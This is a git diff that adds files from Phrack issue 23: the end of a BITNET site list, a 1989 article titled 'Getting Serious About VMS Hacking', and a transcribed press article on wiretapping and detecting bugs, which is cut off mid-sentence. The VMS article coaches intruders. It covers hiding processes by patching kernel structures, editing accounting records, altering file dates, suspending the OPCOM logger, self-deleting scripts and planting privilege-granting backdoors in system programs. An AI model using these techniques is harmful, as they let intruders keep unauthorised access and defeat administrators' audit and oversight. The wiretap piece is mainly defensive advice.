+       University of Louisville
+
+ LA    Louisiana State University
+       Louisiana State University Medical Center
+       Tulane University
+       University of New Orleans
+
+ MA    Amherst College
+       Babson College
+       Bentley College
+       Boston College
+       Boston University
+       Brandeis University
+       Clark University
+       College of the Holy Cross
+       Hampshire College
+       Harvard University
+       IBM VNET Gateway
+       Massachusetts Institute of Technology
+       Mount Holyoke College
+       Northeastern University
+       Regents Computer Network
+       Smith College
+       Southeastern Massachusetts University
+       Tufts University
+       University of Massachusetts at Amherst
+       University of Massachusetts at Boston
+       Williams College
+       Worcester Polytechnic Institute
+
+ MD    American Assoc of State Colleges Univs (AASCU) Meeting
+       Biotechnology Research Center
+       Catonsville Community College
+       Johns Hopkins University
+       Loyola College
+       Montgomery College
+       National Aeronautics and Space Administration
+       National Bureau of Standards
+       National Institutes of Health
+       Naval Health Sciences Education and Training Command
+       Space Telescope Science Institute
+       Towson State University
+       Uniformed Services University of the Health Sciences
+       University of Maryland
+
+ ME    Bowdoin College
+       The Jackson Laboratory
+       University of Maine
+
+ MI    Albion College
+       Central Michigan University
+       Macomb Community College
+       Merit Computer Network
+       Michigan State University
+       Michigan Technological University
+       Oakland Community College
+       University of Michigan
+       Wayne State University
+
+ MN    Control Data Corporation
+       Gustavus Adolphus College
+       Macalester College
+       State University System of Minnesota System Office
+       University of Minnesota
+       University of Minnesota at Morris
+       University of Minnesota Duluth
+
+ MO    Northeast Missouri State University
+       Saint Louis University
+       Southwest Missouri State University
+       University of Missouri
+       Washington University
+
+ MS    Mississippi State University
+       University of Mississippi
+       University of Southern Mississippi
+
+ MT    Montana State University
+
+ NC    Appalachian State University
+       Davidson College
+       Duke University
+       East Carolina University
+       National Institute of Environmental Health Sciences
+       North Carolina State University
+       Triangle Universities Computation Center
+       Triangle Universities Nuclear Laboratory
+       United States Environmental Protection Agency
+       University of North Carolina at Chapel Hill
+       University of North Carolina at Charlotte
+       University of North Carolina at Greensboro
+       University of North Carolina Gen Ad Cntrl Off Ed Comptng Srvs
+
+ ND    North Dakota Higher Education Computer Network
+
+ NE    University of Nebraska - Omaha
+       University of Nebraska Computer Services Network
+       University of Nebraska Lincoln
+       University of Nebraska Medical Center
+
+ NH    Dartmouth College
+       University of New Hampshire
+
+ NJ    BITNET Network Information Center
+       Drew University
+       Educational Testing Service
+       EDUCOM
+       Exxon Research and Engineering Company
+       Institute for Advanced Study
+       Jersey City State College
+       John Von Neumann Center
+       New Jersey Educational Computer Network
+       New Jersey Institute of Technology
+       Princeton University
+       Rutgers University
+       Saint Peter's College
+       Seton Hall University
+       Stevens Institute of Technology
+       Trenton State College
+       University of Medicine & Dentistry of New Jersey
+
+ NM    Los Alamos National Laboratory
+       New Mexico State University
+       University of New Mexico
+
+ NV    University of Nevada
+
+ NY    American Institute of Physics
+       American Physical Society
+       Association for Computing Machinery
+       BITNET-Internet Gateway
+       Brookhaven National Laboratory
+       Canisius College
+       City University of New York CUNY
+       Clarkson University
+       Cold Spring Harbor Laboratory
+       Colgate University
+       Columbia University
+       Columbia University Teachers College
+       Cornell University
+       Fordham University
+       General Electric Corporate Research & Development
+       Hofstra University
+       IBM Watson Scientific Research Center Yorktown
+       Iona College
+       Ithaca College
+       Le Moyne College
+       Long Island University
+       Manhattan College
+       Marist College
+       NASA Goddard Institute for Space Studies
+       New York State College of Ceramics at Alfred University
+       New York University
+       Pace University Pleasantville-Briarcliff Campus
+       Polytechnic University
+       Pratt Institute
+       Rensselaer Polytechnic Institute
+       Rochester Institute of Technology
+       Rockefeller University
+       Skidmore College
+       St. Lawrence University
+       State University of New York Ag and Tech College at Canton
+       State University of New York Ag and Tech College at Farmingdale
+       State University of New York at Albany
+       State University of New York at Binghamton
+       State University of New York at Buffalo
+       State University of New York at Stony Brook
+       State University of New York Central Administration
+       State University of New York College at Brockport
+       State University of New York College at Buffalo
+       State University of New York College at Cortland
+       State University of New York College at Fredonia
+       State University of New York College at Geneseo
+       State University of New York College at New Paltz
+       State University of New York College at Old Westbury
+       State University of New York College at Oneonta
+       State University of New York College at Oswego
+       State University of New York College at Plattsburgh
+       State University of New York College at Potsdam
+       State University of New York College of Technology at Alfred
+       State University of New York College of Technology at Delhi
+       State U of New York Health Science Center at Brooklyn
+       Syracuse University
+       Union College
+       University of Rochester
+       Vassar College
+
+ OH    Bowling Green State University
+       Case Western Reserve University
+       Chemical Abstracts Service
+       Cleveland State University
+       Denison University
+       John Carroll University
+       Kent State University
+       Medical College of Ohio
+       Miami University
+       Oberlin College
+       Ohio State University
+       Ohio University
+       Ohio Wesleyan University
+       Online Computer Library Center (OCLC)
+       University of Akron
+       University of Cincinnati
+       University of Dayton
+       University of Toledo
+       Wright State University
+       Xavier University
+       Youngstown State University
+
+ OK    Oklahoma State University
+       University of Oklahoma Norman Campus
+       University of Tulsa
+
+ OR    Lewis and Clark College
+       Oregon State University
+       Portland State University
+       Reed College
+       Shriners Hospital for Crippled Children
+       University of Oregon
+
+ PA    Allegheny College
+       Annenberg Research Institute
+       Bryn Mawr College
+       Bucknell University
+       Carnegie Mellon University
+       Dickinson College
+       Drexel University
+       Franklin and Marshall College
+       Gettysburg College
+       Haverford College
+       Indiana University of Pennsylvania
+       Lafayette College
+       Lehigh University
+       Millersville University of Pennsylvania
+       Pennsylvania State University
+       Rohm and Haas Company
+       Swarthmore College
+       Temple University
+       University of Pennsylvania
+       University of Pittsburgh
+       University of Scranton
+       Villanova University
+       West Chester University of Pennsylvania
+
+ PR    National Astronomy and Ionosphere Center
+       University of Puerto Rico
+
+ RI    Brown University
+       University of Rhode Island
+
+ SC    Clemson University
+       Medical University of South Carolina
+       The Citadel, The Military College of South Carolina
+       University of South Carolina
+
+ SD    Dakota State College
+       South Dakota State University
+
+ TN    East Tennessee State University
+       Oak Ridge National Laboratory
+       Rhodes College
+       Tennessee Technological University
+       University of Tennessee
+       University of Tennessee at Chattanooga
+       University of Tennessee at Knoxville
+       University of Tennessee at Memphis
+       Vanderbilt University
+
+ TX    Abilene Christian University
+       Baylor University
+       Pan American University
+       Rice University
+       Saint Mary's University of San Antonio
+       Sam Houston State University
+       Southern Methodist University
+       Southwest Texas State University
+       Stephen F. Austin State University
+       Tarleton State University
+       Texas A&M University
+       Texas Christian University
+       Texas Tech University
+       Trinity University
+       University of Houston
+       University of Houston at Clear Lake
+       University of North Texas
+       University of Texas at Arlington
+       University of Texas at Austin
+       University of Texas at Dallas
+       University of Texas at El Paso
+       University of Texas at Houston
+       University of Texas at San Antonio
+       University of Texas Health Science Center at San Antonio
+       University of Texas Medical Branch at Galveston
+       University of Texas Southwestern Medical Center at Dallas
+       University of Texas System
+
+ UT    Brigham Young University
+       University of Utah
+       Utah State University
+
+ VA    College of William and Mary
+       Continuous Electron Beam Accelerator Facility
+       George Mason University
+       James Madison University
+       National Radio Astronomy Observatory
+       Old Dominion University
+       Radford University
+       United States Geological Survey
+       University of Richmond
+       University of Virginia
+       Virginia Commonwealth University
+       Virginia Community College System
+       Virginia Polytechnic Institute and State University
+
+ VT    Middlebury College
+       Norwich University
+       Saint Michael's College
+       University of Vermont
+
+ WA    Fred Hutchinson Cancer Research Center
+       Pacific Lutheran University
+       University of Washington
+       Washington State University
+       Western Washington University
+
+ WI    Lawrence University
+       Marquette University
+       Medical College of Wisconsin
+       University of Wisconisn - La Crosse
+       University of Wisconsin - Oshkosh
+       University of Wisconsin - Stout
+       University of Wisconsin Eau Claire
+       University of Wisconsin Madison
+       University of Wisconsin Milwaukee
+
+ WV    Marshall University
+       West Virginia Network for Educational Telecomputing
+
+ WY    University of Wyoming
+_______________________________________________________________________________
diff --git a/phrack23/8.txt b/phrack23/8.txt
new file mode 100644
index 0000000..9159f9a
--- /dev/null
+++ b/phrack23/8.txt
@@ -0,0 +1,249 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 23, File 8 of 12
+
+                     ____________________________________
+                    |                                    |
+                    |  Getting Serious About VMS Hacking |
+                    |                                    |
+                    |     by VAXbusters International    |
+                    |                                    |
+                    |            January 1989            |
+                    |____________________________________|
+
+The VAX/VMS operating system is said to be one of the most secure systems
+currently available.  It has been massively extended in the past to provide
+features which can help system managers getting their machines locked up to
+abusers and to trace back any attempts to indiscriminate system security.  As
+such, it is not easy getting into VMS machines now without having insider
+information, and it's even harder to stay in.
+
+The following article describes some of the internals which make up the VMS
+security features, and tries to give hints what to do to remain undiscovered.
+The reader should be familiar with the VMS system from the programmer's point
+of view.
+
+Some of the things mentioned are closely related to the internal workings of
+the VAX/VMS operating system.  All descriptions are held as general as
+possible.  It is tried to point out where weak points in the system are
+located, not to give step-by-step instructions on how to hack VMS machines.
+The main reason for this is, that it is very hard to remain undiscovered in a
+VMS system without having good knowledge of the whole system.  This knowledge
+is only aquirable by experience.
+
+To use some of the techniques described herein, some literature is recommended:
+
+     "The VAX Architecture Handbook," published by DEC.  This book describes
+     the VAX processor, it's instruction set and it's hardware.  It is a good
+     book to have on your desk, since it costs nothing (just go to your local
+     DEC store and ask for it) and is only in paperback format.
+
+     "MACRO and Instruction Set," part of the VMS documentation kit.  This is
+     needed only if you want to program bigger things in MACRO.  It's
+     recommended reading, but you don't need to have it on your own normally.
+
+     "VAX/VMS Internals and Data Structures" by L.Kenah and S.Bate.  This is
+     the bible for VMS hackers.  It describes the inner workings of the system
+     as well as most of the data structures used within the kernel.  The
+     Version published always is one version number behind the current VMS
+     release, but as the VAX architecture doesn't change, it is the best source
+     on a description how the system works.  After you've read and understood
+     this book, the VAX won't look more mysterious than your C64.  You can
+     order this book from DEC, the order number for the V3.0 version of the
+     book is EY-00014-DP.  The major drawback is the price, which is around
+     $70-$100.
+
+A good source of information naturally is the source code of the VMS system.
+The easiest way to snoop around in it is to get the microfiche set, which is
+delivered by DEC to all bigger customers of the system. The major disadvantage
+is that you need a fiche reader to use it.  The fiche is needed if
+modifications to the system code are intended, unless you plan to disassemble
+everything you need.  The VMS system is written in BLISS-32 and FORTRAN.  BLISS
+is quite readable, but it might be worthwhile having a FORTRAN hacker around if
+you intend to do patch any of the programs implemented in FORTRAN.  The source
+fiche always contains the current release, so it's useful to check if the
+information in "Internals and Data Structures" is still valid.
+
+
+Hacker's Tools
+~~~~~~~~~~~~~~
+There are several programs which are useful when snooping around on a VMS
+system.
+
+The most important utility might be the System Dump Analyzer (SDA), which is
+started with the command ANALYZE/SYSTEM.  Originally, SDA was developed to
+analyze system crash dumps, which are created every time the machine crashes in
+a 'controlled' manner (bugcheck or opcrash).  SDA can also be used to analyze
+the running system, which is the more useful function.  A process which wants
+to run SDA needs the CMKRNL privilege.  With SDA, you can examine any process
+and find out about accessed files and devices, contents of virtual memory (like
+typeahead and recall buffers), process status and more.  SDA is a watching
+tool, so you normally can't destroy anything with it.
+
+Another helpful tool is the PATCH utility, called up by the command PATCH.  As
+VMS is distributed in a binary-only fashion, system updates are normally
+distributed as patches to binaries.  PATCHES can be entered as assembler
+statements directly.  Combined with the source fiche, PATCH is a powerful tool
+for your modifications and improvements to the VMS operating system.
+
+
+Privileges
+~~~~~~~~~~
+To do interesting things on the VMS system, you normally need privileges.  The
+following lists describes some of the privileges which are useful in the
+onliner's daily life.
+
+CMKRNL
+CMEXEC  These two privileges enable a user to execute arbitrary routines with
+        KERNEL and EXECUTIVE access mode.  These privileges are needed when one
+        plans to access kernel data structures directly.  CMKRNL is the most
+        powerful privilege available, everything which is protected can be
+        accessed utilizing it.
+
+SYSPRV  A process which holds this privilege can access objects via the system
+        protection.  A process holding the this privilege has the same access
+        rights as a process running under a system UIC.
+
+SHARE   This allows a process to assign channels to nonshareable devices which
+        already have channels assigned to them.  This can be used to prevent
+        terminal hangups and to assign channels to system mailboxes.
+
+
+Process States And The Process Control Block
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+When you get into kernel hacking, you should pay special attention to the field
+PCB$L_STS.  This field tells about the process status.  Interesting bits are
+PCB$V_DELPEN, PCB$V_NOACNT and PCB$V_BATCH.  There can be achieved astonishing
+effects by setting these bits.
+
+
+Hideout
+~~~~~~~
+A nice possibility to have is to be unseen by a system manager.  There are many
+ways to get invisible to SHOW USERS, but hiding from SHOW SYSTEM is another
+story, as it doesn't even use standard system calls to get a list of the
+currently running processes.  And in fact, hiding from SDA is even harder,
+since it directly peeks kernel data structures.  Anyway, being invisible to
+SHOW USERS is useful on small systems, where one user more could ring the alarm
+bell of the system operator.
+
+One possibility to do this is to become a subprocess of some non-interactive
+job (like a BATCH or NETWORK process).  The other way is to patch the PCB to
+become a BATCH process or to delete the terminal name (which makes SHOW USERS
+think you are non-interactive as well).  Patching the PCB has a disadvantage:
+The system global variable SYS$GW_IJOBCNT which contains the number of
+interactive users must be directly decremented before you hide, and MUST be
+incremented before you log out.
+
+If you forget this, the interactive job count will be wrong.  If it becomes
+negative, strange effects will show up, which will confuse every system
+manager.
+
+
+Accounting And Audits
+~~~~~~~~~~~~~~~~~~~~~
+The most nasty thing about VMS since release 4.2 is the security auditing
+feature.  It enables the system manager to log almost every security relevant
+event he desires.  For example, access to files, login failures and
+modification user authorization data base can all be monitored, logged and
+written to the system printer.  The first thing to find out in a new, unknown
+system is the awareness of the system management.  The status of the accounting
+system is easily determinable by the command SHOW ACCOUNTING.  Normally,
+everything except IMAGE accounting is enabled.  When IMAGE accounting is also
+enabled, this is the first hint to be careful.  The second thing to check out
+is the status of the security auditing system.  You need the SECURITY privilege
+to execute the command SHOW AUDIT.
+
+If no audits are enabled, and image accounting is not turned on, the system
+normally is not set up to be especially secure.  Such systems are the right
+playground for a system hacker, since one doesn't have to be as careful as one
+has to be on a correctly managed system.
+
+
+Accounting
+~~~~~~~~~~
+The main intention for running accounting on a system is the need to charge
+users for resources (cpu time, printer usage etc.) they use on the machine.  On
+the other hand, accounting can be very useful to track down invaders.  Luckily,
+accounting information is being logged in the normal file system, and as such
+one can edit out information which isn't supposed to be seen by sneaky eyes.
+The most important utility to handle accounting files is, naturally, the
+ACCOUNTING utility.  It has options to collect information which is stored in
+accounting files, print it in a human readable manner, and, most importantly,
+edit accounting files.  That is, you can edit all information out of an
+accounting file which you don't want to appear in reports anymore.  The
+important qualifier to the ACCOUNTING command is /BINARY.
+
+
+File Access Dates
+~~~~~~~~~~~~~~~~~
+One way for system managers to discover unwanted guests is to look out for
+modified system files.  Fortunately, there are ways to modify the modification
+dates in a file's header.  This can be done with RMS system calls, but there is
+no easy way to do that with pure DCL.  There are several utilities to do this
+kind of things in the public domain, so look out in the DECUS catalog.
+
+
+OPCOM
+~~~~~
+OPCOM is a process which logs system and security relevant events (like tape
+and disk mount transactions, security auditing messages etc.).  OPCOM receives
+messages via a mailbox device, formats them, logs the event in the operator
+logfile (SYS$MANAGER:OPERATOR.LOG) and notifies all operators.  Additionally,
+it sends all messages to it's standard output, which normally is the system
+console device _OPA0:.  When OPCOM is started, one message is sent to the
+standard output announcing that the operator logfile has been initialized.
+Thus, it's not recommended to kill OPCOM to remain undiscovered, since the
+system manager most likely will get suspicious if the operator logfile has been
+initialized without an obvious reason.  The elegant solution to suspend OPCOM,
+for the time where no operator messages shall come through.  While OPCOM is
+suspended, all messages will be buffered in the mailbox device, where every
+process with sufficient privilege can read them out, thus avoiding that OPCOM
+reads those messages after it is restarted.
+
+There is one problem with this solution though:  OPCOM always has a read
+pending on that mailbox, and this read will be there even if the OPCOM process
+is suspended.  Unless you're heavily into kernel hacking, there is no way to
+get rid of this read request.  As such, the easy solution is to generate an
+unsuspicious operator message as soon as OPCOM is suspended.  Afterwards, your
+own process (which can be a DCL procedure) reads all subsequent messages off
+the OPCOM mailbox until you feel save enough to have OPCOM resume it's work. By
+the way, the OPCOM message mailbox is temporary and has no logical name
+assigned to it.  You'll need SDA to get information about the device name.
+
+
+Command Procedures
+~~~~~~~~~~~~~~~~~~
+Timely, you'll need DCL procedures to have some routine work done
+automatically.  It is important not to have strange command procedures lying
+around on a foreign system, since they can be easily read by system managers.
+Fortunately, a command file may be deleted while someone is executing it.  It
+is good practice to do so, utilizing the lexical function F$ENVIRONMENT.  If
+you need access to the command file itself from the running procedure, just
+assign a channel to it with OPEN.
+
+
+Piggy-Backing
+~~~~~~~~~~~~~
+It's not normally a good idea to add new, possibly privileged accounts to a
+foreign system.  The better approach is to to use accounts which have been
+unused for some months and to hide privileged programs or piggybacks which gain
+privilege to the caller by some mechanism.  A piggyback is a piece of code
+which is added to a privileged system program, and which gives privileges
+and/or special capabilities to callers which have some kind of speciality (like
+a special process name, for example).  Be careful not to change file sizes and
+dates, since this makes people suspicious.
+
+
+Conclusion
+~~~~~~~~~~
+This file just tries to give an impression how interesting VMS kernel hacking
+can be, and what possibilities there are.  It of course is not complete, and
+many details have been left out.  Hopefully, it has been useful and/or
+interesting lecture.
+
+
+
+               (C)opyright 1989 by the VAXBusters International.
+   You may give around this work as long as you don't pretend you wrote it.
+_______________________________________________________________________________
diff --git a/phrack23/9.txt b/phrack23/9.txt
new file mode 100644
index 0000000..c5aa907
--- /dev/null
+++ b/phrack23/9.txt
@@ -0,0 +1,300 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 23, File 9 of 12
+
+           <?><><><><><><><><><><><><><><><><><><><><><><><><><><?>
+           <|>                                                  <|>
+           <|>   Can You Find Out If Your Telephone Is Tapped?  <|>
+           <|>                 by Fred P. Graham                <|>
+           <|>                                                  <|>
+           <|>            "It Depends On Who You Ask"           <|>
+           <|>                                                  <|>
+           <|>               Transcribed by VaxCat              <|>
+           <|>                                                  <|>
+           <|>                 December 30, 1988                <|>
+           <|>                                                  <|>
+           <?><><><><><><><><><><><><><><><><><><><><><><><><><><?>
+
+
+Unlike most Americans, who suspect it, Sarah Bartlett at least knows she was
+overheard by an F.B.I. wiretap in the computer room of the Internal Revenue
+Service Building in Washington, across the street from the Justice Department.
+On April 25, as she sat at her card-punch machine, the postman handed her a
+registered letter containing a document known in police circles as a "wiretap
+notice."  It told her that the Government had been given permission to
+intercept wire communications "to and from" two Washington telephones for a
+period of fifteen days after January 13, and that during this period her own
+voice had been heard talking to the parties on those phones.  Miss Bartlett
+said nothing to the other girls in the computer room, but she must have been
+stunned.  A few weeks later, federal agents came to the computer room and took
+her away, to face a variety of charges that amounted to being a runner for a
+numbers game.
+
+There are no figures to disclose how many Americans have received such wiretap
+messages, and few people who have gotten them have spoken out.  But the number
+could be over 50,000 by now.  When Congress enacted the requirement in 1968
+that notice of wiretap be given, it intended to sweep away the growing sense of
+national paranoia about electronic snoopery.  But there seems to be an unabated
+national suspicion that almost everybody who is anybody is being tapped or
+bugged by somebody else. Herman Schwartz, a Buffalo, New York, law professor
+who is the American Civil Liberties Union's expert on Governmental
+eavesdropping, estimates that since 1968 between 150,000 and 250,000 Americans
+have been overheard by the Big Ear of the Federal Government or local police.
+"If you have anything to do with gambling or drugs, or if you're a public
+official involved in any hanky-panky and if you're a Democrat, or if you or
+your friends are involved in radical politics or black activism, you've
+probably been bugged," Professor Schwartz says.
+
+Henry Kissinger wisecracks to friends that he won't have to write his memoirs,
+he'll just publish the F.B.I.'s transcripts of his telephone calls.  Richard G.
+Kleindienst has had his Justice Department office "swept."  Secretary of State
+William P. Rogers once shied away from discussing China policy over a liberal
+newspaper columnist's line.  High-ranking officials in New York, Washington and
+Albany have been notified by the New York District Attorney's office that they
+may become targets of blackmailers because their visits to a swanky Manhattan
+whorehouse were recorded on hidden bugs.  The technician who regularly sweeps
+the office of Maryland Governor Marvin Mandel, checking the Civil Defense
+hot-line telephone he had been instructed not to touch, recently found it was
+wired to bug the room while resting on the hook.  Democratic officials waxed
+indignant over the five characters with Republican connections who were caught
+attempting to bug the Democratic National Committee headquarters in the
+Watergate hotel, but when they had earlier found less conclusive proof of the
+same kind of activity, they let it pass without public comment.  The Omnibus
+Crime Control Act of 1968 makes it a crime, punishable by five years in jail
+and a $10,000 fine, to eavesdrop on a telephone call or a private conversation
+without a court order.  Only federal law-enforcement officials and local
+prosecutors in states that have adopted similar wiretap legislation can get
+court permission to wiretap, and the law requires that within ninety days after
+a listening device is unplugged, wiretap notices must be sent to everyone whose
+phones or premises were bugged, plus anyone else (like Sarah Bartlett) who was
+overheard and might later be prosecuted because of it.
+
+However, because of some private investigators and snoopy individuals nobody
+knows how many are ignoring the law against eavesdropping and getting away with
+it, and because none of the rules governing court-approved wiretapping in
+ordinary criminal investigations applies to the Federal Government's
+warrantless wiretapping in the name of "national security," no one can be
+certain his phone is safe.  Before the Supreme Court ruled, 8 to 0, last June
+that the Government must get warrants for its wiretapping of domestic radicals
+in national-security cases, the F.B.I. wiretapped both homegrown and foreign
+"subversives" without court orders.  The best estimates were that this
+accounted for between 54,000 and 162,000 of the 150,000 to 250,000 people who
+were overheard since 1968.
+
+With warrantless wiretapping of domestic radicals now outlawed, the number of
+persons overheard on warrantless devices is expected to be reduced by about one
+fourth.  But even with the courts requiring that more Government bugging be
+reported to the victims, paranoia is fed by improved technology.  Bugging has
+now developed to the point that it is extremely difficult to detect, and even
+harder to trace to the eavesdropper.  The hottest item these days is the
+telephone "hook-switch bypass," which circumvents the cutoff switch on a phone
+and turns it into a sensitive bug, soaking up all the sounds in the room while
+the telephone is sitting on its cradle.  In its most simple form, a little
+colored wire is added to the jumble of wires inside a telephone and it is about
+as easy to detect as an additional strand in a plate of spaghetti.  Even if it
+is found, the eavesdropper probably won't be.  A check of the telephone line
+would most likely turn up a tiny transmitter in a terminal box elsewhere in the
+building or somewhere down the street on a pole.  This would probably be
+broadcasting to a voice-activated tape recorder locked in the trunk of a car
+parked somewhere in the neighborhood.  It would be impossible to tell which one
+it was.
+
+My wife happened to learn about this at the time last year when The New York
+Times locked horns with the Justice Department over the Pentagon Papers, and I
+was covering the story for The Times.  She became convinced that John Mitchell
+would stop at nothing and that the telephone in our bedroom was hot as a poker.
+After that, whenever a wifely chewing-out or amorous doings were brewing, I was
+always forewarned.  If anything was about to happen in the bedroom too
+sensitive for the outside world to hear, my wife would first rise from the bed,
+cross the room, and ceremoniously unplug the telephone. "When someone finds out
+somebody else learned something they didn't want them to know, they usually
+jump to the conclusion they've been bugged," says Allan D. Bell Jr., president
+of Dektor Counterintelligence and Security Inc., in Springfield, Virginia,
+outside Washington.  "If they thought about it, there was probably some other,
+easier way it got out."
+
+Bell's point is that most people get information in the easiest, cheapest and
+most legal way, and that the person whose secrets have been compromised should
+consider first if he's thrown away carbons, left his files unlocked, hired a
+secretary who could be bribed, or just talked too much.  There's an important
+exception, however, that many people don't know about.  A party to a
+conversation can secretly record it, without violating any law.  A person on
+one end of a telephone call can quietly record the conversation (the old legal
+requirement of a periodic warning beep is gone).  Also, one party to a
+face-to-face conversation can secret a hidden recorder in his clothing.  James
+R. Robinson, the Justice Department lawyer in charge of prosecuting those who
+get caught violating the anti-bugging law, insists that it is relatively rarely
+broken.  He debunks the notion that most private eavesdropping is done in the
+executive suites of big business.  Sex, not corporate intrigue, is behind
+ninety percent of the complaints he gets.  After giving the snoopy spouse or
+lover a good scare, the Government doesn't even bother to prosecute
+do-it-yourself wiretappers.  If a private investigator did the bugging, they
+throw the book at him.
+
+Cost is the reason why experts insist there's less wiretapping than most people
+think.  Private investigators who use electronic surveillance don't quote their
+prices these days, but people in the de-bugging business say the cost can range
+from $10,000 per month for a first-rate industrial job to $150 per day for the
+average private detective.
+
+High costs also limit Government wiretapping.  Last year the average F.B.I. tap
+cost $600 per day, including installing the device, leasing telephone lines to
+connect the bugs to F.B.I. offices, monitoring the conversations and typing the
+transcripts.  Considering the informative quality of most persons'
+conversations, it isn't worth it.  Court records of the F.B.I.'s surveillances
+have demonstrated that when unguarded conversations are recorded, the result is
+most likely to be a transcript that is uninformative, inane or
+incomprehensible.
+
+The folklore of what to do to thwart electronic surveillance is almost
+uniformly misguided or wrong.  Robert F. Kennedy, when he was Senator, was said
+to have startled a visitor by springing into the air and banging his heels down
+onto his office floor.  He explained this was to jar loose any bug J. Edgar
+Hoover might have planted.  Whether he was teasing or not, experts say it
+wouldn't have done anything except bruise Senator Kennedy's heels.  Former
+Senator Ralph Yarborough of Texas used to complain that, as each election
+season approached, the reception in his office phone would fade as the current
+was sapped by the multiple wiretaps installed by his political enemies.  Those
+people who think poor reception and clicking on the line are due to wiretapping
+are giving wiretappers less credit and AT&T more, than either deserves.
+Present-day wiretaps are frequently powered by their own batteries, or they
+drain so little current that the larger normal power fluctuations make them
+undetectable, even with sensitive current meters.
+
+Clicks on the line can be caused by loose connections in the phone, cables, or
+central office equipment, wet cables, defective switches in the central office,
+and power surges when batteries in the central office are charged.  A
+sophisticated wiretap records conversations on a machine that turns itself
+silently on and off as you speak.  The tap is designed to work without
+extraneous noises; your telephone isn't.  If things you say in private or on
+the telephone seem to be coming back to you from unlikely sources, your first
+step should be to make a careful check of the room or rooms that might be
+bugged.
+
+If the Federal Government is doing the eavesdropping, neither you nor any but
+the most experienced antibugging experts will detect it.  Nobody has discovered
+a Justice Department wiretap for years, because the telephone company itself
+often taps the line and connects it to an FBI listening post.  FBI bugs have
+become so sophisticated that the normal sweep techniques won't detect them,
+either.  But the kind of eavesdropping that is being done by many private
+investigators is often so crude that even another amateur can find it. Room
+bugs come in two types:  tiny microphones that send their interceptions to the
+outside by wire, and little radio transmitters that radio their overhearings to
+the outside.
+
+Both are likely to be installed in electrical fixtures, because their power can
+be borrowed, their wires can be used to transmit the conversations to the
+listening post, and the fixtures' electrical innards serve as camouflage for
+the electric bugs.  Your telephone has all these attributes, plus three
+built-in amplifiers the eavesdropper can borrow.  You should first remove the
+plastic cover from your telephone's body and check inside for a wire of odd
+size or shape that seems to cut across the normal flow of the circuits.  A bug
+or radio transmitter that feeds on your telephone's power and amplifiers will
+be a thimble-sized cylinder or cube, usually encased in black epoxy and wired
+into the circuit terminals.
+
+Also check for the same devices along the telephone lines in the room or in the
+jack or box where the phone is attached to the baseboard.  You should also
+unscrew the mouthpiece and earpiece to check for suspicious wires or objects.
+Even an expert would not detect a new item that's being sold illegally, a
+bugged mouthpiece that looks just like the one now in your telephone, and which
+can be switched with yours in a few seconds.  After the phone check, look for
+suspicious little black forms wired into television sets, radios, lamps and
+clocks.
+
+Also check heating and air-conditioning ducts for mikes with wires running back
+into the ducts.  Radio transmitter bugs that have their own batteries can be
+quickly installed, but they can also be easier to find.  Check under tables and
+chairs, and between sofa cushions.  Remember they need to be near the point of
+likely conversations to assure good reception.  Sometimes radio bugs are so
+cleverly concealed they are almost impossible to detect.  A German manufacturer
+advertises bugged fountain pens that actually write, table cigarette lighters
+that actually light, and briefcases that actually carry briefs.
+
+Noting that the owner of such items can absent himself from delicate
+negotiations and leave his electronic ear behind, the company observes that
+"obviously, a microphone of this type opens untold opportunities during
+conferences, negotiations, talks, etc."  If you suspect that your telephone has
+been tapped and your own visual inspection shows nothing, you can request the
+telephone company to check the line.  The American Telephone and Telegraph
+Company estimates it gets about ten thousand requests from customers per year
+to check out their lines.  These checks, plus routine repair service, turn up
+evidence of about two hundred fifty listening devices each year.  When evidence
+of a tap is found, the company checks with the FBI and with local police in
+states where the laws permit police wiretapping with court orders.  Until
+recently, if the tap was a court-approved job, the subscriber was assured that
+"no illegal device" was on the line.  This proved so unsettling to the persons
+who requested the checks that now the telephone company says it tells all
+subscribers about any taps found.  If this includes premature tidings of a
+court-approved FBI tap, that's a hassle that AT&T is content to leave to the
+Government and its suspect.
+
+For those who have done the above and are still suspicious, the next step up in
+defensive measures is to employ an expert to de-bug your premises.  A thorough
+job involves a minute inspection of the premises, including X-ray pictures of
+desk ornaments and other items that might contain hidden radio transmitters,
+the use of metal detectors to search out hidden microphones, checks of the
+electrical wiring for signs of unusual currents, and the use of a sensitive
+radio-wave detector to find any stray transmissions that a hidden bug might be
+giving out, plus employment of a radio field-strength meter to locate the bug.
+
+With so much expertise required to do a sound detection job, and with no
+licensing requirements in most states to bar anybody from clapping on earphones
+and proclaiming himself an expert de-bugger, it is not surprising that the
+field abounds with quacks.  A Pennsylvania construction company that had lost a
+series of close bids hired a local private detective last year to sweep its
+boardroom for bugs.  The company's security chief, taking a dim view of the
+outside hotshot, took an ordinary walkie-talkie, taped its on-button down for
+steady transmission, and hid it behind the books on a shelf.  He sat in a room
+down the hall and listened as the detective clumped into the room, swept around
+with his electronic devices, and pronounced the room clean.
+
+Sometimes bogus de-buggers will give clients something extra for their money by
+planting a device and finding it during their sweep.  One "expert" tried this
+twice in Las Vegas with organized-crime figures, who later compared notes and
+concluded they'd been taken.  "Boy, was he sorry," chortled the Justice
+Department attorney who related the story.  If you nevertheless want to have
+your place swept, things are complicated by the telephone company's ban on
+advertising by de-buggers.
+
+As the Missouri Public Service Commission put it when it upheld the telephone
+company's refusal to include "de-bugging" in a detective's yellow-page ad,
+"advertising the ability to detect and remove electrical devices was, in fact,
+also advertising the ability to place those same devices.  Anyone can be pretty
+certain of a reliable job by trying one of the major national detective
+agencies, Burns, Pinkerton or Wackenhut.  They charge $40 to $60 per man-hour,
+for a job that will probably take two men a half day at least.  They specialize
+in industrial work and shy away from domestic-relations matters.  So if that's
+your problem, ask a lawyer or police official which private investigator in
+town is the most reliable de-bugger around.
+
+It may seem too obvious to bear mentioning, but don't discuss your suspicions
+about eavesdropping in the presence of the suspected bug.  W. R. Moseley,
+director of the Burns agency's investigations operations, say in probably a
+majority of the cases, a bugging victim tips off the eavesdropper that he's
+going to call in a de-bugger, thus giving the eavesdropper an opportunity to
+cover his tracks.
+
+For the person who wants to have as much privacy as money can buy, the Dektor
+company is marketing a console about the size of a Manhattan telephone book
+which, for only $3,500, you can purchase to sit on your office desk and run a
+constant check on the various things that might be done to your telephone and
+electric lines to overhear your conversations.  It will block out any effort to
+turn your phone into a bug, will detect any harmonica bug, smother out any
+telephone tap using a transmitter to broadcast overheard conversations, detect
